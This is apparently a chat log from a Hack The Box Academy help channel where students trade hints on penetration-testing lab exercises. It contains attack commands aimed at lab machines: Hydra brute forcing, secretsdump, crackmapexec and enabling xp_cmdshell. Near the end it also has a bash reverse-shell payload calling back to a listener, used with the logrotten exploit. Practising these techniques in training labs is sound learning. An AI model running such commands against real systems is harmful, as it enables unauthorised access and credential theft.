#modules
there is a space in the answer
why couldn't they just write that. Sometimes I feel like deciphering the text itself is a ctf
😄
Hi there,
in the AD Enum and Attack module, I get user x's password in the exercise, but when I try to get a shell or pass the password to a script like secretsdump.exe, PowerShell doesn't take the password.
If I try using RDP to launch cmd as a different user it works. Any idea how to make it work in the shell??
could you provide an example? also including error messages would be helpful
so I have the user ||adunn << SyncMaster757 || and that is the password.
If I try to run `.\secretsdump.exe -outputfile inlanefreight_hashes -just-dc INLANEFREIGHT/adunn@172.16.5.5` it will ask for the password; if I pass the password it will not work and say:
```
[*] Cleaning up...
```
or if I try to do `runas /user:adunn cmd.exe` it will ask for the password and if I provide it, it will not work:
```
Attempting to start cmd.exe as user "INLANEFREIGHT\adunn" ...
RUNAS ERROR: Unable to run - cmd.exe
1326: The user name or password is incorrect.
```
which section is that?
hey friends, I am at Attacking Common Services - Easy, found user f***, trying to brute force FTP with pwd.list but got nothing. I am trying to do it with rockyou with both f**** and f****@inlanefreight.htb; it needs 500+ hours to finish. Am I wasting time?
```
htb-student@172.16.5.225's password:
Permission denied, please try again.
```
even when I am just copying and pasting the password
If you are connected via RDP just do it with the GUI, search for "cmd" or "PS" and do "run as another user" so you can actually confirm that the password you are using is correct
manually type out the password. iirc copy paste somehow broke it
well this is it 🙂
I thought I was doing something wrong, thanks!!
this right here should also work
yupp it is confirmed, I should not copy in windows
this right here should also work
this too does work but in shell, I should as you say write stuff down no copy
some services are faster to brute force, some are slower. FTP is decent, but there is a faster one.
Edit: checked notes again, should not make any difference actually. should be fast regardless
let me check it, thanks a lot
Can someone please give me the answer for one of the Bash Introduction parts? I've been writing different scripts for hours and I don't even think it's a problem with my script
I am trying to follow along with the DCSync section and facing an issue running this command, any thoughts:
```powershell
Get-DomainUser -Identity * | ? {$_.useraccountcontrol -like '*ENCRYPTED_TEXT_PWD_ALLOWED*'} | select samaccountname,useraccountcontrol
```
error for context:
```
Get-DomainUser : The term 'Get-DomainUser' is not recognized as the name of a cmdlet, function, script file, or
operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try
again.
```
I imported the AD module
I think it is PowerView
this one is part of PowerView, so you'll need to import that
my bad, sorry guys!
no worries, I've made that mistake countless times lol
lol, thanks!!
it worked, thanks friend 😊
awesome 🙂
Aren't there modules for programming skills improvement?
I'm pretty sure there is a python module and bash/powershell stuff
File Upload Attacks - Whitelist Filters section https://academy.hackthebox.com/module/136/section/1289
Can anyone help me with this: The above exercise employs a blacklist and a whitelist test to block unwanted extensions and only allow image extensions. Try to bypass both to upload a PHP script and execute code to read "/flag.txt".
I have uploaded the file but I get a not found response when searching for it.
?
Hi there,
I am facing issue with doing the AD Enum and Attack [Privileged Access] section.
I am connected and I have a shell as the user ||adunn||. Trying to execute `Get-NetLocalGroupMember -GroupName "Remote Management Users"` I can't get any answer other than forend, so I can't solve it
dm you
I think it is about which user has the CanPSRemote privilege, not RDP. Can you please paste the question or confirm that it is indeed about the PSRemote privilege?
Module Password Attacks
Section Easy Lab
I am running Hydra for the FTP service. It's been 31 min and no password found.
```bash
hashcat -r custom.rule --stdout | awk '!x[$0]++' | tee mutated.password.list # the awk part gets the unique passwords without changing their order https://stackoverflow.com/questions/11532157/remove-duplicate-lines-without-sorting
hydra -u -L username.list -P mutated.password.list <ip> ftp
```
Am I doing anything wrong? Should I reset the machine?
Anyone please?
Can you send the academy link? It would help
I never did this one, but you probably uploaded a fake image, which is actually a reverse php shell, right? I'd upload a real image, copy the image link with right mouse button, see the path it got uploaded and reproduce with the fake one.
are you sure that you are using the correct wordlist?
yep 🤔 it's the one provided in the resources
It takes a very long time
for the not found thing i'm guessing this #modules message
I have done this.
I have uploaded an image, e.g. shell.png
The image exists on ${link}/shell.png
Then I try one of the character injection attacks where I upload e.g "shell.php/.jpg", which is uploaded successfully (judging by the response message).
When I go to ${link}/shell.php/.jpg, I get a not found error
do not forget that you can face false positives
you have more than 1 list
hmm thanks for the tip, most probably this is the case
and for the section hint use the given bash script but add more or replace some of the extensions
and I recommend you use -t 64 to make it faster
wdym?
hint try without the ||mutated wordlist|| first
In my experience I need to reset the machine because it gets crazy with too many requests, but maybe that was a windows behavior only
@rustic arrow you should be able to find it with the regular user and pass list
No need to use mutated yet
cool, so someone gave me a "bad" hint
so which question are you on?
No success with curl neither.
most likely your extension is wrong because i did that section without using any special character (that you can't access using a browser)
I am having issues with a +0 "pointless" question in "Linux Privilege Escalation" "Environment Enumeration". The question is "Enumerate the Linux environment and look for interesting files that might contain sensitive data. Submit the flag as the answer." The server that starts does not show the same results as the examples above. Specifically the bash history is sent to /dev/null, not a file, and the example for "find all hidden files" is empty, while all of the other examples work as suggested. I don't think a zero point question should be this obtuse; am I an idiot missing something basic or is there an issue with the system?
|| grep || is your friend
i dont fully understand the goal but from browsing around on the system and reading the page it seems i am trying to log into lab_adm who has sudo and i am supposed to find a password 'accidentally stored' in a file somewhere? is this the right path?
No, you really just need to find a file that contains the flag.
Flags at HTB usually start with HTB
Try to find files which contain HTB.
thanks that worked i was making it too complex.. from the 'leet' speak in the flag i think maybe another method was intended though
I am currently doing the Cracking Passwords with Hashcat module. On page 12, we were meant to download some zip onto the box - I wasn't sure how to do this, I just curled the download link and I think I got it. However, I am confused about using zip2john with the zip - I tried many different commands and could not get the hash, the command just did nothing. Can anyone give me a hint or help me out on what command I am meant to use for that?
hello, I'm using this:
```
crackmapexec smb 10.129.203.10 -u john -p john-secrets
SMB    10.129.203.10   445   WIN-HARD   [*] Windows 10.0 Build 17763 x64 (name:WIN-HARD) (domain:WIN-HARD) (signing:False) (SMBv1:False)
SMB    10.129.203.10   445   WIN-HARD   [+] WIN-HARD\john:john-secrets
```
and it tells me that I can log on, but what is the correct pass?
Currently stuck on the Pivoting skills assessment. I know I'm supposed to be uploading some kind of payload to ||webadmin||, but I am not sure how without the password
so which section are you on? (next time just say the section name not the page number in the url)
Cracking Miscellaneous Files & Hashes
if you are in the CME module then I can't help because I haven't done that module, but from that example the john user could be a domain user and that domain user could only have SMB access
so did you extract the file in Misc_hashes.zip and use 7z2john on that extracted file?
@kindred comet also if 7z2john isn't working then run
sudo apt-get install libcompress-raw-lzma-perl -y
Hi, anyone knows why i cant see the season channels? thx and sorry for using this channels
When i try to exploit host-3 with eternal blue in module shells and payloads it doesn't work someone help
The section is the live engagement
no worries if you specify that at the end but if you are new here read #welcome and #rules after use /verify at #bot-commands and ask that at #1080884182336675872
thanks man
hint there is something different than cred that you can use to login as that user but you can just host a python server on your machine and use wget on the target machine
yeah,
zip2john ~/hashcat.7z\
hint: use the exploit module that only lets you run 1 command instead of getting a shell
7z2john is for .7z file and zip2john is for .zip file
Can you give me a hint where to import the exploit for host-2
What other user in the domain has CanPSRemote rights to a host?
Tried 7z2john but still does nothing. Also ran the sudo command
So it’s not the same as RDP
I am trying right
I can't find any user other than forend
using the Get-NetLocalGroupMember -GroupName "Remote Management Users" and bloodhound
try to use the cypher query with bloodhound
in the "analysis" tab scroll to the bottom "Custom queries" and enter the cypther query provided in the module. You should be able to find the other user
dm me in case you have still problems
This all should be done in the MS01 right with the adunn access
I did collect all the data with the "htb-student" user
Did you figure it out yet? Otherwise I can check it out
No, 7z2john ~/hashcat.7z\ still doesn't work for me
Ok, give me a moment
Thanks
I don’t have that exact module, but I’ll try to help
What extension is the file?
Regular .zip?
so are you getting some type of error with the tool? or does the tool work and you just don't get any hash?
Are you using pwnbox?
No error, but it just goes to a new line and does nothing
If so, try “python2.7 /opt/7z2john/7z2john.py <encrypted file>”
I am using the built in virtual environment
I'll try this
Perfect I think it worked
Thank you!
Just finding what group a user or machine belongs to can be done from any domain connected machine.
As long as you have a domain user credentials
OMG, in the Password Attacks easy lab, after 2 hours of brute forcing FTP and SSH using the resources list and the mutated password list (and without it), no login 😖
Hi everyone. I'm currently working on Linux Fundamentals particularly on Filter Contents and I'm having trouble with the questions. The two ones that I can't seem to understand is the first and the third. For the first, I suppose I need to use netstat -l to get all services that are listening but that's not it. The third, now, curl can't reach the link given (tried on WSL it works, but not on the pwnbox).
Any hint … my goal today finish all lab in Password Attack Module
How to solve this problem: Find a file with the setuid bit set that was not shown in the section command output (full path to the binary).
Which language is better for programming?
If I remember correctly, the username starts with m
http://dontasktoask.com/ which module and section are you in? what is the question you are having an issue with? and what did you try?
someone just asked about this, you can just scroll up a bit, but the hint was don't use the ||mutated wordlist||
I’m brute forcing now I hope login
path: Linux Privilege Escalation
part: Special Permissions
question: Find a file with the setuid bit set that was not shown in the section command output (full path to the binary).
my way: `find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null`
my question: I don't know which of the displayed contents is the answer (My English is not very good, please understand)
Using Hydra to brute force with the 3 users starting with m: no login
using all users in username.list (from the resources): no login
all of this with password.list without mutation: no login
no worries if English isn't your first language, just don't ask dumb stuff without context. That section is kinda dumb for a beginner because you have to know which binary is or isn't setuid by default
but a tip for that question is first run the first given command in the example on the target box and compare the output of that and the output of the example
Give me a moment
Take ur time
I have found it within 10 seconds
Are you trying to bruteforce ftp or ssh?
Actually I restarted my box twice 😅
Both
What was the command you used for ftp
`hydra -L username.list -P password.list ftp://IP`
That should work
Make the user list with the m accounts only and let me know
I used -t 48 as well to make it a bit faster
Ok Ill try
Thank you
To be sure 3 users started with m ?
Yes
You can even try them individually
`-l name -P password.list`
In individual users working now
👍🏼
Thanks for your time bro
You’re welcome👍🏼
I thought this day would never come 
https://academy.hackthebox.com/achievement/51013/147
someone pls add dislocker to this module
Passwords are still the primary method of authentication in corporate networks. If strong password policies are not in place, users will often opt for weak, easy-to-remember passwords that can often be cracked offline and used to further our access. We will encounter passwords in many forms during our assessments. We must understand the various ...
Good job 👍🏼
#858470491676737536 for suggestions
im trying to get this banner on this excerise but using ncat it wont work. It just says Could not resolve hostname "#": Name or service not known
Any idea what i am doing wrong?
What exactly did you try?
i just put ncat followed by the target ip it gives me
show the command
The exact thing i typed is
"ncat 161.35.32.44:30114"
idk if you meant a picture or not, sorry
try ncat 161.35.32.44 30114
nope
different tools have different formats they prefer
always read a tools help page before using it
okay, thanks for the tips
exactly what he said
@thorn urchin when will you start your next try?
probably this weekend but we shall see, theres some things I want to finish up first before I start
I see, good luck! 💪🏼 you got this
Can I DM someone about the pivoting and tunneling skills assessment? I am unsure how to connect to the 2nd machine through my tunnel.
I accidentally spent 500 cubes on white box pentesting instead of advanced SQL injection. Can I refund the cubes? Literally just bought it, haven't done anything yet
dm me
Id contact support
any hint to make privilege in user ||jason|| in password attack-medium lab I used all ideas I learned .. or should be dig more ?
Let me check
anything down for you guys? Can't access the modules on my dashboard anymore
What have you tried so far?
Hint is: check the history
I just managed to solve it again
I really should start taking notes lol, would make it way easier to help
But now I just keep resolving things, which isn’t bad either I guess
Anyone know how to solve "what are the credentials to access the Edge-Router?"
This is last question of credential hunting in windows module
The hint asks me to use Ansible. But I have no idea how this can be used
hahaha me too i want to help but can't remember any of these
did you check non-default programs installed? They may raise a "flag"
Git, Chrome, Edge, MS Health Tools, MS Visual C++, Mozilla, OpenOffice 4.1.11, VM tools, WinSCP
None of them relates to networking stuff. I'm sorry if I sound dumb
dm you
hey friends, i am at Attacking Common Services - Hard, i tried Impersonate all 3 users, none have sysadmin, so i dont have permission to enable ex-cmd, and when trying execution using linked Server i only get 'testadmin' and null output, tried to get the flag with the execution but didnt work
I would say read the MSSQL section one more time and I'm sure you will find the answer you're looking for. You're close, just see what's left that you didn't try yet
anyone elses vpn keep disconnecting?
i tried Read Local Files too but 'You do not have permission to use the bulk load statement'. Capture MSSQL Service Hash : it was 'aaaaaaaaaaaaaaaa' and that's everything mentioned there 😅
i wrote about it at first
ok i will check more about it
oh yeah! Sorry haven't seen it. I guess it's time for me to shutdown
😂 thank you for your hard working 😊
I haven't done anything. You were close, so I thought it would have been good for you to get back to the material, that's all
Hi there, fellas! I need some help with the Blind SQL Injection module, specifically on the Out of band extraction section
hello everyone, I'm stuck with the Footprinting Medium Lab, I saw a bunch of weird ports
and I'm struggling to figure out how to enumerate correctly
any hint about what is the best route to enumerate this lab correctly?
Hi, may I talk about the resolution of Attacking Common Services - Easy ? I have just finished it and wonder if there is an alternate way to solve it as suggested by the flag name ?
Hi! I am working on the "Stack Based Buffer Overflows on Linux" chapter, Take control of EIP. I can do the question but don't know what they are actually looking for. Question: "Examine the registers and submit the address of EBP as the answer."
What weird ports?
Dm if you'd like
I'm on that "Finding Files and Directories" section and used findstr for searching for that waldo thing ... how long do I have to wait for that to finish?
I'm trying to run an nmap scan to get the version of a service, but when I run the command it says "the host seems down. If it is really up, but blocking our ping probes, try -Pn", which I did, and that told me there was a host up, but nothing else seems to be working (I am using my own VM and am connected to the academy VPN)
Exploiting Web Vulnerabilities in Thick-Client Applications. Can i Get some help. I can login with qtc user but cant exploit sql injection
this is very difficult
Can I use my own machine in skills assessments?
yes
yup, just ensure if a VPN connection is required or not
Can i dm someone about this?
Greetings from 2023 this comment helped me find what I was missing, if you're still around here thanks so much! 😄
resolved after searching forums.
still not able to search for a file in a Windows machine, I feel sooo stupid, I'm sitting here for over an hour
Can i dm someone about this?
hey guys, must the Footprinting Medium Lab be done from the Pwnbox machine?
Not necessarily, any module can be done from your own vm too if you connect to vpn
What’s not working?
access/read the NFS folder
```
ls: cannot open directory 'target-NFS/TechSupport': Permission denied
```
Give me a moment, need to spin up vm
ok.
even if I try the command described in the module
```
ls: cannot access 'mnt/nfs': No such file or directory
```
is not working either....
I must be missing something basic, but can't realize what it is
well bro
ls /mnt/
it probably doesnt exist
?
did you check the folder you are looking for actually exists first
well, u r right....
Change to root acc
And you should be able to access
I'm just trying to replicate the command described in the module with the Lab
uhm let me see
Just tried it and it worked
ok., it's working
hi, I am doing the Getting Started module's privilege escalation section and I looked and found I cannot run any commands as user2. However I know with this output I should be able to run something as user2:
```
user1@ng-605555-gettingstartedprivesc-y4zwt-57f7c4cdb8-ckdd7:/bin$ sudo -l
Matching Defaults entries for user1 on
ng-605555-gettingstartedprivesc-y4zwt-57f7c4cdb8-ckdd7:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User user1 may run the following commands on
ng-605555-gettingstartedprivesc-y4zwt-57f7c4cdb8-ckdd7:
(user2 : user2) NOPASSWD: /bin/bash
user1@ng-605555-gettingstartedprivesc-y4zwt-57f7c4cdb8-ckdd7:/bin$ /bin/bash
user1@ng-605555-gettingstartedprivesc-y4zwt-57f7c4cdb8-ckdd7:/bin$ runuser -l user2 bash
runuser: may not be used by non-root users
user1@ng-605555-gettingstartedprivesc-y4zwt-57f7c4cdb8-ckdd7:/bin$ sudo runuser -l user2 bash
[sudo] password for user1:
Sorry, user user1 is not allowed to execute '/usr/sbin/runuser -l user2 bash' as root on ng-605555-gettingstartedprivesc-y4zwt-57f7c4cdb8-ckdd7.
user1@ng-605555-gettingstartedprivesc-y4zwt-57f7c4cdb8-ckdd7:/bin$ sudo runuser -u user2 bash
[sudo] password for user1:
Sorry, user user1 is not allowed to execute '/usr/sbin/runuser -u user2 bash' as root on ng-605555-gettingstartedprivesc-y4zwt-57f7c4cdb8-ckdd7.
<SNIP>
```
now, can I ask why? I guess I know the answer, but I'd like to have the right answer....
am I overthinking it?
Su user2?
hey @analog dock can you try and help me with the nmap thing when you have time
What module
-sV -Pn doesn’t work?
somebody please help me with Exploiting Web Vulnerabilities in Thick-Client Applications
I have qtc access, I just can't SQL inject
yes I tried that it won't let me execute that command
Have a bit of a hard time reading that copy paste lol
Gimme a moment, I think i have that module
have you tried specifying the whole path like using runuser -l /bin/bash ?
I haven't done the module yet, just thinking out loud
I am on the Getting Started module and its Service Scanning section. I tried that but it says the host is down, but then I put -Pn and it says there is a host
-Pn will always say there's a host even if there isn't, that's what -Pn is for
it's bypassing the automated host discovery checks
Gotcha, i tried running it as sudo nmap -sV for services and it still says host is down or something
sounds like you probably have some sort of connection issue with the lab
or similar
Oh now it works.
I've been trying for about an hour honestly and even reconnected to the VPN but it still didn't work till now
happens sometimes
Yeah its a little frustrating
you just have to follow the instructions exactly
99% of the issues is cause ya skipped a step on accident
does aquatone order the reports by most important as well?
I learned after 2 hours of googling and trying that you connect to the PowerShell via SSH and cmd commands don't work there ...
Sudo -u
```
user1@ng-605555-gettingstartedprivesc-y4zwt-57f7c4cdb8-ckdd7:/bin$ sudo runuser -l user2 -c NOPASSWD
[sudo] password for user1:
Sorry, user user1 is not allowed to execute '/usr/sbin/runuser -l user2 -c NOPASSWD' as root on ng-605555-gettingstartedprivesc-y4zwt-57f7c4cdb8-ckdd7.
user1@ng-605555-gettingstartedprivesc-y4zwt-57f7c4cdb8-ckdd7:/bin$ sudo runuser -l user2 -c /bin/NOPASSWD
[sudo] password for user1:
Sorry, user user1 is not allowed to execute '/usr/sbin/runuser -l user2 -c /bin/NOPASSWD' as root on ng-605555-gettingstartedprivesc-y4zwt-57f7c4cdb8-ckdd7.
user1@ng-605555-gettingstartedprivesc-y4zwt-57f7c4cdb8-ckdd7:/bin$ sudo runuser -l user2 -c /bin/bash/NOPASSWD
[sudo] password for user1:
Sorry, user user1 is not allowed to execute '/usr/sbin/runuser -l user2 -c /bin/bash/NOPASSWD' as root on ng-605555-gettingstartedprivesc-y4zwt-57f7c4cdb8-ckdd7.
user1@ng-605555-gettingstartedprivesc-y4zwt-57f7c4cdb8-ckdd7:/bin$ sudo runuser -u user2 -c /bin/bash/NOPASSWD
[sudo] password for user1:
Sorry, user user1 is not allowed to execute '/usr/sbin/runuser -u user2 -c /bin/bash/NOPASSWD' as root on ng-605555-gettingstartedprivesc-y4zwt-57f7c4cdb8-ckdd7.
user1@ng-605555-gettingstartedprivesc-y4zwt-57f7c4cdb8-ckdd7:/bin$ sudo runuser -u user2 -c NOPASSWD
[sudo] password for user1:
Sorry, user user1 is not allowed to execute '/usr/sbin/runuser -u user2 -c NOPASSWD' as root on ng-605555-gettingstartedprivesc-y4zwt-57f7c4cdb8-ckdd7.
<SNIP>
user1@ng-605555-gettingstartedprivesc-y4zwt-57f7c4cdb8-ckdd7:/bin$ sudo runuser -l user2 -c "sudo -u"
[sudo] password for user1:
Sorry, user user1 is not allowed to execute '/usr/sbin/runuser -l user2 -c sudo -u' as root on ng-605555-gettingstartedprivesc-y4zwt-57f7c4cdb8-ckdd7.
user1@ng-605555-gettingstartedprivesc-y4zwt-57f7c4cdb8-ckdd7:/bin$
```
lmao
Read what sudo -l says
You’re allowed to run /bin/bash as user2
Without password
I gave you the command, you just have to fill it in now
he is persistent
There’s no runuser needed
trying the same commands a hundred times he will get something different
the longest is Active Directory Enumeration and Attacks
I can't imagine jumping directly into HTB without knowing the basic terminal
yeah, I just failed my first PNPT attempt
@quasi wave did you get it?
i spent the first 3 out of the 5 days for the attempt
losing my mind on a bruteforce
because i didnt grep extract in burp and the response length [on success] was 342 instead of all the failed attempt 343s
It’s also shown in the cheatsheet
ok
found it thanks
All you need to do is change the user and change /bin/echo to what you are allowed to run
I was overthinking it
can u send the sudo -l?
normally just searching it in gtfobins is enough
@analog dock in what module are u now?
the pivoting one
no I found it now I'm doing second question
Anyone able to give me a nudge on AD Enumeration & Attacks: Assessment Pt 2? I'm up to 3rd last question. I've got admin on MS01 with the m## user and am trying to find the creds for the c## user, but have hit a brick wall.
ooof funny skill assessments
Oh boy
u got the flag of the question 3?
yeah, you up to that part?
I'm having trouble with the second question. I'm logged in as user2 and it won't let me use sudo -l
why?
it let me when I was user1
if the output is something like "User has no sudo privileges" then you have your answer
it doesn't have that output
its requiring user2's password but I didn't get user2's password in order to log in as user2
are u in the ms01?
I can't access shadow file
What module?
yeah i got admin on MS01
but I can access passwd file but that obviously doesn't help
privilege escalation section of getting started module
then read the section again
Then passwd isn't needed
ok cool
The section is super informative
hmmm... I've tried the usual mimikatz modules and snaffler/lazagne... I'll poke around a little more
reading the section names should be enough
to know which are common attacks/enumeration
I see 
There’s no passwd or shadow file needed to escalate privileges there
What you need is shown in the section
ssh-keygen?
wait ok but they are not letting me use the keys I generated back as user1
I can't add them to file
no permissions
You don’t need to generate keys
You don't need to generate keys
I've rechecked everything and I haven't skipped a step
ok hold on
You need to find keys in the system
didn't u even tell the solution here 
That was for question 1
He needs to get root now
can someone help me with CrackMapExec: Skill Assessment ?
||ls -la|| maybe?
That would show him the directory he needs if he gets to the map before that
I'm looking in root folder. am I looking in wrong place? I looked at bash_history file and that didn't help
Root folder is good
ok
But we were talking about what you needed
Keys
So in what folder do you find that?
It’s shown in the section
the only section I am thinking of says it's in the .ssh folder
.ssh folder has keys
then the next step is for me to use SSH?
CrackMapExec: Skill Assessment, I have been trying to get initial credentials for the 1st question. I followed what the hint says but no results (about NULL Authentication) and tried every possible variation, and tried using the IPs and VHosts as well, yet no results. The question is "What's the password of the account you found?" so I must use --users
yet nothing so far
I am doing it but it's not letting me in:
```
user2@ng-605555-gettingstartedprivesc-y4zwt-57f7c4cdb8-ckdd7:/root/.ssh$ ssh root@209.97.176.220 -i id_rsa
^C
user2@ng-605555-gettingstartedprivesc-y4zwt-57f7c4cdb8-ckdd7:/root/.ssh$ ssh root@209.97.176.220 -i id_rsa -p 30243
```
I also tried it with localhost and 127.0.0.1 and it didn't help
Because you’re doing it from the box
oh I see
You need to do it from your vm
ok hold on
Well you can do it from pwnbox, just not from user2
can u send the link?
I get this error: `Error enumerating domain users using dc ip xx.xx.xx: NTLM needs domain\username and a password` and the hint indicates to use null authentication
then use null authentication to enumerate
i havent unlocked it sorry
i did use it, but i get errors
what command u using
```
┌─[us-academy-1]─[10.10.15.146]─[htb-ac-605555@htb-ixxp0td6ac]─[~]
└──╼ [★]$ ssh root@209.97.176.220 -i authorized_keys -p 30243
Warning: Identity file authorized_keys not accessible: No such file or directory.
ssh: connect to host 209.97.176.220 port 30243: Connection refused
┌─[us-academy-1]─[10.10.15.146]─[htb-ac-605555@htb-ixxp0td6ac]─[~]
└──╼ [★]$ ssh root@209.97.176.220 -i id_rsa -p 30243
Warning: Identity file id_rsa not accessible: No such file or directory.
ssh: connect to host 209.97.176.220 port 30243: Connection refused
┌─[us-academy-1]─[10.10.15.146]─[htb-ac-605555@htb-ixxp0td6ac]─[~]
└──╼ [★]$ ssh root@209.97.176.220 -i id_rsa
Warning: Identity file id_rsa not accessible: No such file or directory.
^[[A^C
┌─[us-academy-1]─[10.10.15.146]─[htb-ac-605555@htb-ixxp0td6ac]─[~]
└──╼ [★]$ ssh root@209.97.176.220 -i authorized_keys
Warning: Identity file authorized_keys not accessible: No such file or directory.
```
lmao I'm doing that from my VM and its not letting me in
`proxychains -q crackmapexec smb dc01.inlanefreight.local -u '' -p '' --users`
I have tried many variations of the command
Did you copy the id_rsa to your host?
And did you give it the right permissions?
found it 🫠 I swear i already spun up that tool before... but it must've just been when I was faffing about on SQL01... spending hours on this stuff, it all bleeds together lol
try -N maybe?
hold on ok
I got locked out gotta log back in
ok I'm back in root folder
@quasi wave got it?
U just writing a ssh key
I know I got in
ah well, he deleted it
YES!! AD Enum & Attacks is finally done... man that module took some time.
Just finished public exploits section in the getting started module and it feels so rewarding completing the exercise
Anyone able to get the MASS IDOR ENUMERATION script working?
I can't figure out how to get the script working
Someone @ me if anyone gets the script given in MASS IDOR ENUMERATION working I just used intruder so 🙂
More of a general question here. When answering academy questions, I often have to search through forums to find clues on which tools to use or options to consider.
Often, the way to the solution is a method I never knew about or considered. Is this a normal part of the process, or am I cheating myself by looking outside the module for breadcrumbs?
Would anyone be able to assist me in completing the "Whitelist Filters" section in File Upload attacks
I've honestly been stuck on this section for a long time
Tough question, I'm definitely in somewhat of the same boat. Sometimes, like with this MASS IDOR ENUM, I had no idea how to do it the intended way. Finding non-intended ways to do something isn't bad, but it can be beneficial to find the intended way after.
Dm if you'd like
tysm. I'll send something over now
why lab on HTB academy is super slow =,=
50% because of your internet speed and the lab's physical location (in the UK the last time I checked) and 50% because sometimes the academy lab sucks
some question on some section could be straight out dumb or the only way to get the answer is through the hint but generally you can solve most of the question with the given info on the section and of course sometime you need to do additional research about a topic (not looking for hint on forum 🤣 )
if you are still having issues with the script, hint: just make it send ||POST|| requests instead
If i want to learn assembly 64_x86 specifically for windows development, will the assembly module in htb fit me? Because i read that the module is built on linux fundamental knowledge, and because assembly is cpu-dependent i am not sure
There is a problem with the machines: when I ping the machine it doesn't respond. I tried to fix it and it didn't work. Also even the walkthrough says to ping
Once I got the hash here (Cracking Passwords with Hashcat -> Cracking Miscellaneous Files & Hashes), a long hash starting with $7z, I tried running hashcat -m 11600 $7z... /usr/share/wordlists/rockyou.txt, but it says "Separator unmatched" & "No hashes loaded." I tried googling it to understand and trying different things to validate the hash, but I don't seem to be getting anywhere with it. The section doesn't say anything about this, does anyone have any insight?
anyone done with Logrotate on Linux Privilege Escalation? idk why but I can't even seem to find the logrotate.conf file, it doesn't seem to be in the /etc directory, and i tried searching all directories for logrotate.conf, but I still can't find it 😦
Haven't done this section yet but if it's a dot file it could be .logrotate.conf
I have not found the file either, but I have completed the section
Have a look at the user directory.
You should find answers there
hey friends, i am at Attacking Common Services - Hard, i tried to impersonate all 3 users, none have sysadmin, so i don't have permission to enable ex-cmd, and when trying execution using the linked server i only get 'testadmin' and null output, tried to get the flag with the execution but it didn't work
managed to solve it after googling, turns out it's similar to a htb retired machine. could i ask you a question? ||why does writing to the file trigger the logrotate, how do we determine this is how the rotate occurs without a .conf file to refer to?|| i only know this because i read the writeup for the retired machine
or to be more specific, i don't get how to enable xp_cmdshell with the EXECUTE command, i think this might be the goal
Logrotate ensures that log files do not become too large.
When exactly they rotate is in the configuration file.
If you look at the files in the user directory, you will see that there is only a single entry in the log file that was saved. That means that after an entry the logfile is obviously rotated.
Did you show the linked servers?
oh i see! so the limitation on size is what made the rotate occur. thank you for the help 🙂
Why not try this server? 😉
Does anyone know what does the error refer to here?
try to remove the colon
nvm didn't see the whole error
You probably just copied the command out.
i don't get it, i am already trying it 😂
Thank you sir
but there is no output
i am just not sure what type of command to put in the EXECUTE command, is it sql commands or cmd
should i be trying something like this? : EXECUTE('select @@servername, @@version, system_user, is_srvrolemember(''EXECUTE sp_configure "show advanced options", 1;GO;RECONFIGURE;GO;EXECUTE sp_configure "xp_cmdshell", 1;GO;RECONFIGURE;GO'')') AT [LOCAL.TEST.LINKED.SRV]
Try to impersonate a user with admin rights and then query the linked server
Anyone able to help me on the pivot skills assessment? I'm rdp'd into the ml user, and managed to get the .dmp file, but I'm unsure how I can transfer it to pwnbox
with xfreerdp you can mount a drive so you can easily copy data back and forth.
/drive:<NAME>,<PATH>
can't get no root ./logrotten -p ./payload /tmp/tmp.log
Waiting for rotating /tmp/tmp.log...
module: LINUX PRIVILEGE ESCALATION, content: Logrotate
Could I get help with Active Directory Enumeration & Attacks? I am stuck on the skills assessment Pt. 1, Q4. I cannot pivot to MS01. I am able to access WEB-WIN01 with evil-winrm, psexec, and the webshell, but trying to move to MS01 via a PSSession has failed, and I can't connect directly from my own machine as MS01 is on a separate network. I have tried to use reverse ssh dynamic port forwarding and proxychains, but that failed with evil-winrm since I can't get the prompt to show up where I can type in my password, and psexec is using cmd.exe and trying to elevate to powershell loses the full interactivity. not sure what else i could try.
Edit: I am able to use psexec to get onto MS01 with enter-pssession but then i have 0 interactivity and can't see the output of any of my commands
Pay attention to the path to the log file
Thank you!
i gave the right path of the log file, it's not giving any reverse connection
!
Not sure if it is the best way, but i used net use to mount the remote folder on that one
Did you also write an entry in the log file so that the log file is rotated?
yes sir
Waiting for rotating
Which log file did you use?
the one which was already there by default in the htb-user: htb-student@ubuntu:~/backups$ ls
access.log
am i doing smth wrong
Yes probably, because it should work with that
./logrotten -p ./payload ./backups/access.log
Waiting for rotating ./backups/access.log...
u said smth about an entry
what kind of entry should i have added, is it smth specific or any random thing?
you can refer to what i asked @acoustic owl earlier, that might help you
am still stuck
try googling for a walkthrough on hackthebox machine 'Book'
./logrotten -p ./payload ./backups/access.log
Waiting for rotating ./backups/access.log...
it's still stuck
Now write something in the log file. Does it rotate then?
Nice
Skills assessment was pretty nice
Gl in AD)
Thank you, I’m not too familiar with ad so that will be challenging
just finished that yesterday, was an insane learning experience. all the best!
hello i need help on the last question of SHELLS & PAYLOADS: The Live Engagement
Then try "Introduction to AD"
echo node >> ./backups/access.log
htb-student@ubuntu:~$ ./logrotten -p ./payload ./backups/access.log
Waiting for rotating ./backups/access.log...
If I feel like I need it, I will
Log in with two terminals.
In one you write the command for logrotate, in the other you write an entry into the logfile
The Penetration Tester Path assumes knowledge of the Information Security Foundations Path
echo givemeflagbitch >> ./backups/access.log
htb-student@ubuntu:~$ ./logrotten -p ./payload ./backups/access.log
Waiting for rotating ./backups/access.log...
Renamed ./backups with ./backups2 and created symlink to /etc/bash_completion.d
Waiting 1 seconds before writing payload...
Done!
htb-student@ubuntu:~$ ls
backups backups2 logrotten payload super.c
htb-student@ubuntu:~$ nc -nlvp 9001
Listening on 0.0.0.0 9001
maybe you need to look at the module content again... your reverse shell listener isn't set up properly
u mean the payload
cat payload
bash -i >& /dev/tcp/10.129.204.41/9001 0>&1
and i used this exploit: https://github.com/whotwagner/logrotten/blob/master/logrotten.c
ayo tell me one thing, am i supposed to use the ip of the vm or the vpn?
?
it should be the ssh vm ip cuz that's what i am using
I do not understand the question.
For the RevShell?
You have to take the IP of the VM from the VPN. Mostly interface tun0
HONEY IT'S STILL NOT GIVING ANY CONNECTION
*small letters*
nc -nlvp 9001
Listening on 0.0.0.0 9001
Sweetie, your caps lock key is stuck 😉
ahahahhaa
@slender shoal basically it is the attack host, that is ssh’d into Ubuntu
What is in your payload file?
i compiled this: https://github.com/whotwagner/logrotten/blob/master/logrotten.c
yes, the Payload
bash -i >& /dev/tcp/10.10.15.14/9001 0>&1
